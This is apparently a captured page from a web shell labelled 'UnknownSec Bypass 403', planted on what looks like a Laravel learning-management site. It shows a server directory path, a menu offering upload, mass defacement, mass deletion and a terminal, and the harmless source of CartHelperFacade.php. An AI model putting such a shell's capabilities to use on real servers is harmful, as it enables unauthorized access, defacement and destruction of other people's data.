UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_8167adff8173
/
app
/
Helpers
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
CartHelperFacade.php
<?php namespace EstudioLMS\Helpers; use Illuminate\Support\Facades\Facade; /** * Class CartHelperFacade * @package EstudioLMS\Helpers */ class CartHelperFacade extends Facade { /** * Get the registered name of the component. * * @return string * * @throws \RuntimeException */ protected static function getFacadeAccessor() { return 'carthelper'; } }
Copyright © 2026 - UnknownSec